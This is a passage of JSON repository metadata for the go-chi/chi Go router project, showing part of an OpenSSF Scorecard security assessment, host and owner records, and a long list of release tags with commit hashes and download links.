process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.2/manifests"},{"name":"v4.0.1","sha":"1a6bb108ccf279c8dac6f9bad857d773b4f9b421","kind":"commit","published_at":"2019-01-17T22:35:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"e95203758b2a6ec24a8e97124d5719ffe5ec1374","kind":"commit","published_at":"2019-01-10T15:56:14.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.0/manifests"},{"name":"v3.3.4","sha":"08d9051ef6546d57c5dca8eae13e6df362e2d568","kind":"commit","published_at":"2019-01-08T01:17:51.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.4","html_url":"https://github.com/go-chi/chi/releases/tag/